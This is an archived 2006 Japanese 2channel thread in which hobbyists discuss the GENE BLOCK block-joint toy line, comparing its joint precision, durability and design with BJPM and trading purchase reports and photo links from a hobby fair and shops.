製品の予告はBJPMの頃からあったけど、製品リリースの量もさることながら
サイト情報の更新頻度もすごいし、ワンフェス情報公開の予告なんてのは
今までなかった
精度は現状維持でもそれほど気にならない方なので、あとはこれがいつまで
続くかだな…

276 :ぼくらはトイ名無しキッズ:2006/12/20(水) 03:10:49 ID:ngnr+9SPO
今回は競合相手がいるから潰しにかかってるのかもな

277 :ぼくらはトイ名無しキッズ:2006/12/21(木) 10:53:24 ID:8t0eQQC30
みこしろは色々あったとはいえ身内に対してまで敵にするような扱いを平気でしていたので
彼に近かった順にどんどん見限っていったって話。ガレキに対しては作るのはいいけど
売るのはダメというスタンスを絶対に崩さずしかもOKの基準が気まぐれでしかなかったのも原因。
OKの基準が存在せずNGの基準は胸先三寸次第だったものだからガレキの支援パーツと聞いて
参入した初期メンバーのほとんどがブチギレ。残っている中でもガレキまでやってるのはわずか3コ。
残りは単なるファンサイトどまりでしかない。

浅井真紀が二度とBJPMに触っていないのも規格違いのBJPMを自主生産したのも
単なる気まぐれだけとは思えん。みこしろなんかやっただろ絶対。

278 :ぼくらはトイ名無しキッズ:2006/12/21(木) 11:11:09 ID:4OoLECtTO
>>277
おいおい
自分の妄想をさも事実だったかのように喋らないでくれよ
もしやみこしろ氏になんか怨みでめあるのかい?ファニーボーイ

279 :ぼくらはトイ名無しキッズ:2006/12/21(木) 11:23:41 ID:Jf2MCsPA0
>>277
パラベラムのことなら、あれはBJPMじゃ全然無くてただの小型ポールジョイントだよ。現物見たことあんの?
しかも浅井さんがブロックドレスの企画を凍結したのは、彩参加で一般商品化が確定したからだよ。
むしろ邪魔したのは彩サイド。
素人はロム専してろ?ファニーボーイ

280 :ぼくらはトイ名無しキッズ:2006/12/21(木) 12:21:03 ID:8t0eQQC30
当事者が釣れマスタ

>しかも浅井さんがブロックドレスの企画を凍結したのは、彩参加で一般商品化が確定したからだよ。

これは初耳っていうかこれこそ妄想のくぁwsつyひこくぁwstgp

281 :ぼくらはトイ名無しキッズ:2006/12/21(木) 12:23:29 ID:Jf2MCsPA0
くすっ。
あわてて釣りのふりして照れ隠しかい?
かわいいね、チェリー

282 :ぼくらはトイ名無しキッズ:2006/12/21(木) 12:52:19 ID:8s/Ke7KP0
>当事者が釣れマスタ
部外者が知ったかぶりするなよファニーボーイ

283 :ぼくらはトイ名無しキッズ:2006/12/21(木) 12:55:16 ID:XPRrQdHt0
ところでここはゲネブロのスレであって一応みこしろさんは関係ないぜ
スレ違いだぜファニーボーイ

284 :ぼくらはトイ名無しキッズ:2006/12/21(木) 13:09:15 ID:Jf2MCsPA0
それから、いくら2ちゃんだからってあったこともない人をよびすてはだめだよ。
ファニーボーイ

285 :ぼくらはトイ名無しキッズ:2006/12/21(木) 15:06:48 ID:tw/161kE0
まあ落ち着けよチェリーボーイども

286 :ぼくらはトイ名無しキッズ:2006/12/21(木) 15:20:29 ID:XPRrQdHt0
暮れは何かとお金が出て行く季節なんだが
今年は年忘れ福袋我慢してゲネブロ買うよ。

287 :ぼくらはトイ名無しキッズ:2006/12/21(木) 19:10:14 ID:IDWKEbRR0
アキバの虎でジェネ見たけどパッケージまでサイトのデザインとリンクさせた
気合いの入ったものだったな。一体このやる気はどこから湧いてるんだw

288 :ぼくらはトイ名無しキッズ:2006/12/21(木) 19:28:32 ID:GnYy4uKo0
WHF会場で販売って事で今週末に販売開始、早い所では今日あたり入荷でミンプラで予約した俺には出荷メールが届いてる
・・・と睨んでたんだけど予想は外れたかな

289 :ぼくらはトイ名無しキッズ:2006/12/21(木) 23:28:04 ID:NDOOejGb0
そうまさんのサイト更新キター

290 :ぼくらはトイ名無しキッズ:2006/12/22(金) 00:07:44 ID:POSPA4390
コンテナユニットに興奮。
だが彩クオリティでこれは自殺行為では…
それともよほど自信があると見て良いのか?

291 :ぼくらはトイ名無しキッズ:2006/12/22(金) 01:01:23 ID:UpXT1PT40
みこちゃんが気分屋さんで王様になりたがり(実際にはハダカの王様)なのは
周知の事実だけど、GENE BLOCKはその呪縛から解き放たれたんだからココで
そんな話をするのはイクない。
どうしてもみこちゃんとその仲間たちについて語り合いたいんだったら
【新生】BJPMブロックジョイント8枚目【復活】でやりたまえ。

292 :ぼくらはトイ名無しキッズ:2006/12/22(金) 02:13:08 ID:UzS66zol0
イベント初売りってことは、今週末(ちうかぶっちゃけ明日あたり)
ヲタショップには出回り始めると考えていいんだろうか…

293 :ぼくらはトイ名無しキッズ:2006/12/22(金) 09:47:36 ID:Aa+Byvip0
BJPMの時はイベント売りの前から売ってたんだっけ?
キャラホビで売ってたのは先行とか言ってた記憶があるんだが

294 :ぼくらはトイ名無しキッズ:2006/12/22(金) 09:49:03 ID:POSPA4390
>>293
BJPMはワンフェス当日発売、ただしガチャは前の晩には店頭にあった。

295 :ぼくらはトイ名無しキッズ:2006/12/22(金) 10:18:50 ID:Hup0MY5E0
>>291
DOUI
あのわけのわからない性格じゃなきゃ今頃ガレキディーラー軍団を引っさげて
ワンフェスの一部を完全に支配できたはず。

296 :ぼくらはトイ名無しキッズ:2006/12/22(金) 19:16:53 ID:w+82LSFG0
明日のWHFには行けそうにない...
レポたのみcom(v_v)

297 :ぼくらはトイ名無しキッズ:2006/12/22(金) 22:12:28 ID:UzS66zol0
通販予約組の発送通知キターが無いってことは、マジこの週末には
イベントでしか発売されないってことか…

しょうがねえ、ストライダムでも組むか('A`)=3

298 :ぼくらはトイ名無しキッズ:2006/12/23(土) 10:37:25 ID:yMmslmCv0
>>291
>>295

内輪ネタ乙。ただでさえロイヤリティ逃れのパチモンから派生した
ジェネなんだから、これ以上品位を落とすようなマネはしなさんな。

299 :ぼくらはトイ名無しキッズ:2006/12/23(土) 11:07:05 ID:zi7STkKY0
内輪ネタって、要は自分が彩及びそうま氏側の関係者だって
名乗ってるようなもんだよな
事情しらんユーザーの視点で見たらどうみても
BJPMの新商品かパチモノのどちらかじゃないかジェネ

300 :ぼくらはトイ名無しキッズ:2006/12/23(土) 11:07:12 ID:iovxDYA8O
某県市内のメロン、ボークス、虎穴どこも発売して無いorz

301 :ぼくらはトイ名無しキッズ:2006/12/23(土) 11:08:53 ID:iovxDYA8O
あまりの興奮にsage忘れの始末
orz

302 :ぼくらはトイ名無しキッズ:2006/12/23(土) 16:42:55 ID:7FugCM0PO
WHFに行けなかったんだけど、レポートが全く無いのはやっぱり災クオリティだったって事なんだろうな。

どうあがいても災は災でしかないのか。w

303 :ぼくらはトイ名無しキッズ:2006/12/23(土) 17:17:01 ID:aTzjx+pp0
なにそのはやとちり叩き。
バカじゃねーの?

304 :ぼくらはトイ名無しキッズ:2006/12/23(土) 18:14:39 ID:jCkkjtXGO
参加者の帰宅と製品のレポートうぷを気長に待ちませう

305 :ぼくらはトイ名無しキッズ:2006/12/23(土) 20:01:04 ID:7i/UpfqP0
WHFより帰宅。
早速ちょいといじってみてるけど、今の所ボールジョイントのズレ歪みなんかは確認せず。
パーツをはめた感じではちょっと硬目だけど「カチッ」と音がしてはまる。
パーツによってハメづらい硬さもあるけど、ペンチに布挟んでとか無さそうね。
同人のみたいな吸い付く感じは無くもっと乾いた感じで保持力はちょい劣る感じ。
クラックの心配はそこそこ厚抜きなんであまり心配はなさそう。
耐久性はもうしばらくいじって見ないとわかんないなあ。

ま、とりあえず第一報はそんな感じで。

306 :ぼくらはトイ名無しキッズ:2006/12/23(土) 20:16:51 ID:EhKb6nfHO
写真無しで報告とな

307 :ぼくらはトイ名無しキッズ:2006/12/23(土) 20:23:07 ID:iovxDYA8O
一報があるだけありがてぇもんだよ

308 :ぼくらはトイ名無しキッズ:2006/12/23(土) 20:34:07 ID:wzU4gmvg0
>>306
どんだけ態度Lなんだよw

あ、早売りHJに3月までの情報が画像付で来てたね。
公式に更新されてる第八弾まで+第九弾のDEADCLAW
(ワンコ=人狼?の変形モノ)。

309 :ぼくらはトイ名無しキッズ:2006/12/23(土) 21:06:54 ID:7i/UpfqP0
ごめんねごめんね。
お母さん会場のサンプルの写真とかは撮ってこなかったの。
帰ってちょっといじった後ご飯食べてたの。
レシピ通りに組むのめんどいから、適当に小物作ってみたの。

ttp://kunekune.breeze.jp/up/uploader/src/up4307.jpg

310 :ぼくらはトイ名無しキッズ:2006/12/23(土) 21:35:52 ID:IFMji5Rh0
>>309
肩がモロに・・・BJPM
いや、タマが無いけどさ

311 :ぼくらはトイ名無しキッズ:2006/12/23(土) 22:11:18 ID:EhKb6nfHO
>>310
ヒント:もともとBJPM

312 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:02:38 ID:Zy4Hzuv30
>>305 >>309
WHFレポ乙です.
品質的には最低レベルはクリアしたって感じですか?
ますますリリースが楽しみです。

他にイベントだからこそのネタって何かありませんでしたか?

313 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:04:46 ID:7i/UpfqP0
なんだネガキャンか。
結構急いで写真も撮ったのにな(´・ω・`)
足の引っ張り合いみたいになっちゃったりするのは避けたいなあ。
両方買う人間としては。

ま、いいや。もうちょい手を加えたんでうpしとこ
ttp://kunekune.breeze.jp/up/uploader/src/up4321.jpg

314 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:13:17 ID:Zy4Hzuv30
>>313
乙です。
雑音は無視すれば気にならないものですから…

WHFにSOFIAは展示されていましたか?
シリーズの中では異質な感じがするんですが、どんなもんなのかな?

315 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:14:11 ID:7i/UpfqP0
>>312
品質としては遊べるラインをクリアしてると思いますな。
全部のパーツを試したわけじゃないんで、前述のちょっと硬い所があるのは気になりますが。
ま、この辺の感覚はあくまで個人的な感想とではありますが。

えーっとイベントならでは的な物は特に見受けられなかったみたいですな。
展示品としてはEX-3とかソフィアなんかも実際飾ってあったんで、
今後順調にリリースされるんかなあ、とは思いました。
でも第一弾は今月下旬予定で店頭まだなのよね……。


316 :ぼくらはトイ名無しキッズ:2006/12/23(土) 23:53:31 ID:KzhmzA0R0
FORCE-UNITとF-SOLDIERを買ってきた。
同人版はさわったことないので比較はできないけど十分遊べる。
って比較対象が彩版しかないんだから参考にならんか。

とりあえずFORCE-UNITにF-SOLDIER部分の組立説明書が入ってないのは不親切すぎる。
まあ箱絵見れば組むことはできるけど。


317 :ぼくらはトイ名無しキッズ:2006/12/24(日) 00:00:11 ID:EhKb6nfHO
画像無しで報告とな

318 :ぼくらはトイ名無しキッズ:2006/12/24(日) 13:08:16 ID:0I/rO6MOO
>317
ttp://web.a.pic.to/zoom.php?p=5qlj3-4-0985.jpg

319 :ぼくらはトイ名無しキッズ:2006/12/24(日) 14:29:28 ID:ZhVwyU7b0
そろそろ掲示板誕生させないとマズイね

320 :ぼくらはトイ名無しキッズ:2006/12/24(日) 15:09:47 ID:TZHjXFdgO
ヒント:公式
それにしても報告か1件しかないとは・・・
ブログも検索したけどどのブログにもジェネブロの話題が無いからな・・・
これは駄目かもわからんね

321 :ぼくらはトイ名無しキッズ:2006/12/24(日) 15:16:04 ID:EC5hFS0s0
まあ認知度も無いだろうからねえ
BJPM自体も別に人口の多いもんでもないし

HPをチェックしてるマメな人も少ないだろうし
WHF自体そんなに人の行くようなイベントでもない感じがするし
関東圏じゃないと気軽にも行けないしな

まったり通販が来るのを待つか・・・

322 :ぼくらはトイ名無しキッズ:2006/12/24(日) 15:21:14 ID:EFBvTBhc0
まぁBJPMのヘビーユーザーは全国で50〜100人程度だと思うよ。

323 :ぼくらはトイ名無しキッズ:2006/12/24(日) 15:23:22 ID:TZHjXFdgO
そっかー
青Fソルジャーと青エアロユニットを組み合わせて早く作りたいよママン
でもなぁ・・なんでフォースユニットは赤と青しかないのかしら
フレイムユニット使い物にならなそうだよ

324 :ぼくらはトイ名無しキッズ:2006/12/24(日) 16:26:07 ID:jHiekT3N0
>320
>それにしても報告か1件しかないとは・・・

>305と>316で2件もあるよ!50%も過小にするとはアンチの工作員だな!
自分で言いながらorz


325 :ぼくらはトイ名無しキッズ:2006/12/24(日) 19:25:29 ID:1MVhTJCO0
昨日買ってきて今作ってみたけど
作った奴の写真とか見たい香具師いる?


326 :ぼくらはトイ名無しキッズ:2006/12/24(日) 19:30:33 ID:jHiekT3N0
ノシ
素立ちだけじゃなくていろいろポーズつけて見せてくれ

327 :ぼくらはトイ名無しキッズ:2006/12/24(日) 19:55:52 ID:94HZCav+0
耐久性が気になるんで、ちょっと割れるまで遊んでみせてくれ。

328 :325:2006/12/24(日) 20:05:20 ID:1MVhTJCO0
>>326
ちょっとまってて今写真とって来るわ

>>327
耐久性はいいとおもうよ
全体的にはまり具合はガンシェルドール2よりは緩め
金型での♂玉のずれがなくなってるから割れにくくはなってる
割れるまで遊ぶのは割れてから報告するわw

329 :325:2006/12/24(日) 20:24:11 ID:1MVhTJCO0
http://zipdekure.net/up/file/up0966.zip

結構撮ったけど量があったのでzipでまとめたわ
ほかリクエストあればいってくれ

330 :ぼくらはトイ名無しキッズ:2006/12/24(日) 21:02:01 ID:EFBvTBhc0
なんとなくジェネの勝利を感じた

331 :ぼくらはトイ名無しキッズ:2006/12/24(日) 21:07:00 ID:94HZCav+0
>>329
乙w
白い人チンコ起ててはしゃぎすぎwwww(最後疲れて座り込んでるしw)

332 :ぼくらはトイ名無しキッズ:2006/12/24(日) 21:10:40 ID:jHiekT3N0
おお、安定してるじゃまいか。
グリグリ動かしてもグリップ力は変化しない?
BJPMんときにはポーズ変えるだけで関節が抜けたりしたからなあ。


333 :ぼくらはトイ名無しキッズ:2006/12/24(日) 22:08:04 ID:TZHjXFdgO
zipじゃ未練

334 :ぼくらはトイ名無しキッズ:2006/12/24(日) 22:18:00 ID:NAV2BIDJ0
別の板でとあるスレのまとめサイトをやってる者なんですが、あぷろだ要りますか?

335 :325:2006/12/24(日) 22:28:47 ID:1MVhTJCO0
>>331
勢いでやった、後悔はしt(ry

>>332
基本的には今までのシリーズと同じだな
金型が良くなったから安定してるだけだ
前のシリーズですっぽ抜けていたのはズレのせいで抜けていただけだしね
その点で言えばみこしろさんとかはひどいいわれようだったんだね

>>333
PCじゃないのか、だとjpgとかか
とりあえずさっきの一部
http://zipdekure.net/img/src/up1289.jpg
http://zipdekure.net/img/src/up1290.jpg
http://zipdekure.net/img/src/up1291.jpg
http://zipdekure.net/img/src/up1292.jpg

336 :ぼくらはトイ名無しキッズ:2006/12/24(日) 22:36:53 ID:TZHjXFdgO
>>335
あぁありがと
やっぱ目とか色塗らないと微妙だな

337 :325:2006/12/24(日) 22:42:38 ID:1MVhTJCO0
>>336
正直なところあまりデザインが気にくわんなぁ
角張りすぎな気がする、まるみがないのがちょっと…
色塗ればまぁ違うんだろうね

338 :ぼくらはトイ名無しキッズ:2006/12/24(日) 23:15:53 ID:TZHjXFdgO
>>337
外装と内格の色合わせると以外といいかもよ

俺はこういうコンセプトのロボ好きなんだよなあ
中の貧弱なロボにアーマー着せれるみたいな
ただ、Fソルジャーとフォースユニットが合ってる?と聞かれると微妙かな
しかもbjpmとは違い、色塗りしないと立体感ないし

339 :ぼくらはトイ名無しキッズ:2006/12/25(月) 02:14:33 ID:06UE5ODY0
お、良いじゃない。
ちゃんと頭や手の形したパーツがあるのは
ブロック玩具としてはうまくないんだろうけど
好き勝手に組めるプラモと考えればアリだね。

大きさはどれくらい?ファルケンリッターくらい?
早く欲しいなあ、もう!

340 :ぼくらはトイ名無しキッズ:2006/12/25(月) 04:26:59 ID:Pf4vnxD90
Fソルはちょっと無いかなぁ。

341 :ぼくらはトイ名無しキッズ:2006/12/25(月) 11:49:36 ID:hLgPMWdf0
WHFで入手できたのでちょいとだけいじった感想。
組み立てに関してストレスはほとんど感じませんでした。
色も悪くない。
ただし部分的にゆるくなりがちな部分があったのですが
この辺は微調整が難しいところでしょう。
ボール一個が保持できる(ポーズを付けられる)重量の限度は
クラブコマンドの腕くらいじゃないでしょうか。

エクスサーバントは2枚のランナーで6種もの組み方を提示していますが
1箱につきレシピは1種のみです。窓があってどれが入っているか
わかるようにはなっていますが、6種とも入れてくれたっていいのに・・・
エフソルジャーは単体ではさびしすぎる。フォースユニットの
外装をこそバラ売りすべきでは?外装だけでは単体の製品として
成り立たないってことはないと思いますが・・・

そしてフォースユニットにエフソルジャーの組み立て説明がないのは
当然ソルジャーを買っているだろ?という傲慢さを感じてムカツク(笑)

展示品ではソフィアも見ましたがやはり単色は見劣りします。
ランナー一枚構成だったと思うけどやはり2色は欲しい。
せめて部分的にシールとか貼るといいのに
パーツにディテール付けていくのは嫌いじゃないですが
方向性を狭めないかちょっと不安です。
期待の商品であればこそ、評価も辛口にならざるを得ないですね。

342 :ぼくらはトイ名無しキッズ:2006/12/25(月) 13:11:36 ID:r7jJSY+90
買えた人ってどこで購入した?
近場のイエサブ、ボークスには置いてなくてしょんぼり。
通販だと箱単位になるからフォース1個ずつ欲しい身としては
高い買い物になっちゃうんだよね。

343 :ぼくらはトイ名無しキッズ:2006/12/25(月) 13:16:17 ID:dyT9Sd7Y0
>>342
WHFの先行(になっちゃった)品だと思うよ

344 :ぼくらはトイ名無しキッズ:2006/12/25(月) 13:16:44 ID:+RPTr6jjO
>342
報告した人はみんなWHFで購入

345 :ぼくらはトイ名無しキッズ:2006/12/25(月) 13:19:21 ID:r7jJSY+90
>>343-344
レスありがとう。
1月ごろにでもまた見に行ってみるよ
BJPMは取り扱ってたから多分仕入れると思うし。

346 :ぼくらはトイ名無しキッズ:2006/12/25(月) 14:32:57 ID:2jUpk7YOO
虎曰く27日あたりらしいよ

347 :ぼくらはトイ名無しキッズ:2006/12/25(月) 15:50:51 ID:Iq88y2xhO
虎店長乙

348 :ぼくらはトイ名無しキッズ:2006/12/25(月) 17:27:44 ID:r7jJSY+90
>>346
年内に手に入りそうだね
仕事納めの帰りにでも見に行くとするよ。

虎は流石に近くに無いけどw

349 :ぼくらはトイ名無しキッズ:2006/12/25(月) 18:19:28 ID:06UE5ODY0
このところ、まだかなまだかなーって毎日イエサブのぞいてたさ
27日か、明後日だね。たのしみー。

350 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:24:54 ID:fx5fFVRJ0
新しい虎のフィギュア売り場ってさ、最上階な上に、
途中がメイド喫茶とかやおい売り場とかで、ちょっと行き辛くなったよな。
行ってしまえばすいててゆったりサンプルとか見れるんだが。

351 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:38:31 ID:+RPTr6jjO
>350
ジェネをよこせと言わんばかりに、怒号の勢いで突っ走れば良いんでは?

352 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:44:49 ID:kUB2+rxe0
>341
エクスサーパントは全部同一のランナーだったのか。
すげえな。

>350
ちょっと行き辛くなったからこそすいててゆったりサンプルとか見れるんじゃなかろうか

353 :ぼくらはトイ名無しキッズ:2006/12/25(月) 21:55:53 ID:sm11QDPH0
>>350
いや、普通にエレベーターで行けばメイド喫茶とか関係なくね?

354 :ぼくらはトイ名無しキッズ:2006/12/26(火) 00:54:54 ID:+/7Lwldr0
組立説明書をホームページで公開するなんて有り得ないのかな?
今の彩ならやってくれそうな気がしなくも無い。

355 :ぼくらはトイ名無しキッズ:2006/12/26(火) 23:30:47 ID:8CZw6SyI0
年末ギリギリなんかに発売するもんだから、この盛り下がりっぷり…

356 :ぼくらはトイ名無しキッズ:2006/12/26(火) 23:32:23 ID:nv/3Ht380
だってカタログチェックしないと…

357 :ぼくらはトイ名無しキッズ:2006/12/27(水) 00:02:33 ID:+/7Lwldr0
精度的には概ね良好みたいですね。
国産化なんか必要ないなー。

358 :ぼくらはトイ名無しキッズ:2006/12/27(水) 01:04:27 ID:usGdElmu0
まあしかし、今後も油断する事無く見守りたい所だね。
BJPMではシリーズ重ねる度にズレ酷くなった気もするか。

359 :ぼくらはトイ名無しキッズ:2006/12/27(水) 01:53:23 ID:NuZSgJANO
多分ソフィア辺りではズレ醜い気が・・・

360 :ぼくらはトイ名無しキッズ:2006/12/27(水) 11:42:51 ID:cVzds1BqO
虎、入荷確認

361 :ぼくらはトイ名無しキッズ:2006/12/27(水) 17:38:20 ID:/oZtOule0
通販には無いのね…>トラ

362 :ぼくらはトイ名無しキッズ:2006/12/27(水) 21:23:29 ID:32qyJRB/O
ラジ館ブキヤと虎に入荷してたよ

363 :ぼくらはトイ名無しキッズ:2006/12/27(水) 21:48:46 ID:0SLQ15vOO
ラジ館でフレイム買ってきた
アトリエ彩だし普通にBJPMだと思って初めて買うにはちょうどいいか、と思ってたら別物なのね。
フレームだけ組んだけど面白そうだ、早く帰ってアーマ付けてやらねば

364 :ぼくらはトイ名無しキッズ:2006/12/27(水) 22:24:09 ID:cVzds1BqO
組んでみた。

EXとFソルはビルドの拡張性、精度共に良好。
この値段でこれだけの精度とパーツ量があるなら文句は言えない。
ただ、彩オリジナルのフレイムユニット君…君だけはダメだwww
デザインセンス悪すぎ精度悪すぎ

365 :ぼくらはトイ名無しキッズ:2006/12/27(水) 23:28:38 ID:NuZSgJANO
画像無しでレビューとな

366 :ぼくらはトイ名無しキッズ:2006/12/27(水) 23:32:18 ID:7PZ8u3L6O
>365ttp://web.a.pic.to/zoom.php?p=5qlj3-4-0985.jpg

367 :ぼくらはトイ名無しキッズ:2006/12/28(木) 00:51:35 ID:lEnHhSXK0
予約してるけど出荷メールさえまだ来ないよ

368 :ぼくらはトイ名無しキッズ:2006/12/28(木) 01:51:58 ID:Idtj3drf0
つーか、買ってきたけどさ…これデザインダサすぎね?
意匠のクオリティが、Tシリーズから一歩Fidiaに近づいた(退化した)気がする…('A`)
なんつうか、BJPMと違う形で成型しやすい形、ってだけのデザインというか。

材質と精度は彩版より大分良くなってる(国産BJPMを知らなければ、手放しで誉めても
よかったくらい)のになあ。

369 :ぼくらはトイ名無しキッズ:2006/12/28(木) 02:43:34 ID:n+I/oYlf0
見た目は組み方でどうにでもできるじゃないか。ブロックトイなんだし。


370 :367:2006/12/28(木) 07:00:50 ID:lEnHhSXK0
って朝起きたらやっとミンプラから発送メールが届いてたよ

371 :ぼくらはトイ名無しキッズ:2006/12/28(木) 11:31:02 ID:+1yYdyvH0
いじってみて俺的ファイナルアンサー。
これEXのシリーズが相馬氏で、Fとかのラインは彩デザインだね。
EXサーバントは拡張性が高く、Tフレームの遺伝子を受け継いだブロックトイとして十分あそべる。
Fソルジャー、フォースユニットは内殻ロボに外郭のオプション付けるタイプで、応用がほとんど利かない。
ここにきてる人、正月楽しむならEXの色替えの多々買いがお勧め。
気になる人だけフォースユニットを一品だけ買って試して見るといいぜ。
こいつはTフレームの自家パチモンだね。

372 :ぼくらはトイ名無しキッズ:2006/12/28(木) 12:58:54 ID:YPmXSmyK0
今日再びジェネを探しに行ったがまだ入荷してないとの事orz
このシリーズは毎回予定より遅いのだそうで。。。
明日もう1回行ってなかったら年明けるまで諦めるか

373 :ぼくらはトイ名無しキッズ:2006/12/28(木) 13:07:14 ID:jPJIfDgd0
「このシリーズは毎回」…どのシリーズだw

しかしコレ、とら以外で売ってるのか?
取扱いがBJPMより明らかに減ってね?

374 :ぼくらはトイ名無しキッズ:2006/12/28(木) 13:09:16 ID:jPJIfDgd0
ああ、ブキヤも扱ってるんだな。
昨日、日本橋店に無かったのは仕事納めで
店員にやる気がなかったんだろうか…

375 :372:2006/12/28(木) 14:01:29 ID:YPmXSmyK0
>>373
彩製品だからBJPMを指して言ってたんだと思う。
まぁ、入荷する予定がある事が分かっただけでも良しだけどね

売ってる箇所に関してはイエサブはあると思う。
というか確認したところがイエサブ。

376 :ぼくらはトイ名無しキッズ:2006/12/28(木) 15:26:10 ID:93jp5ni+0
ミンプラから着いた
ソルジャー、サーバント、フォース各1box頼んだら思いがけなく大きな箱に入ってきたw


377 :ぼくらはトイ名無しキッズ:2006/12/28(木) 15:55:21 ID:V1IdAlqOO
電ホビにF、EX載ってた角にちっさくだけど

81 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)